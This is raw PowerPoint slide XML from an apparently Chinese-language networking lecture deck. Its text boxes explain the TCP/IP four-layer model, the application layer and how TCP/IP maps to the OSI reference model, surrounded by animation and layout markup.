                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>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75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>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2"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42" presetClass="entr" presetSubtype="0"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="42" presetClass="entr" presetSubtype="0"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par>
                          <p:cTn id="42" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="43" presetID="42" presetClass="entr" presetSubtype="0"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="42" presetClass="entr" presetSubtype="0" fill="hold"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="2700020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(application layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：应用层是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络协议体系结构的最高层，是计算机网络与最终用户的界面，为网络用户之间的通信提供专用的程序。从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的七层协议的功能划分来看，下面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层主要解决支持网络服务功能所需要的通信和表示问题，应用层则提供完成特定网络功能服务所需要的各种应用协议。</a:t>
            </a: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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Snap1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2750716" y="411510"/>
            <a:ext cx="3371850" cy="1584325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="1995686"/>
            <a:ext cx="4572000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开放式系统互连参考模型的对应关系</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1854369" y="2672973"/>
            <a:ext cx="5400600" cy="1600438"/>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26670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accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议并不符合</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>开放式系统互连参考模型的七层参考模型。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议采用了四层结构，分别为网络访问层、网络层、传输层、应用层。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议模型结构和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>开放式系统互连参考模型的对应关系如图所示。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea"/>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accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议是全世界广泛使用的网络通信协议，因为几乎所有的网络通信都是基于此协议簇的，所以本章以此为重点，当然，这里讨论的一些基本原则同样适用于其他类型协议的通信。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea"/>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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558471" y="1043303"/>
            <a:ext cx="8064896" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议由四层构成并协同工作，完成主机之间的数据传输，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的四层及简要说明见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547664" y="1491630"/>
            <a:ext cx="5753100" cy="21907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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
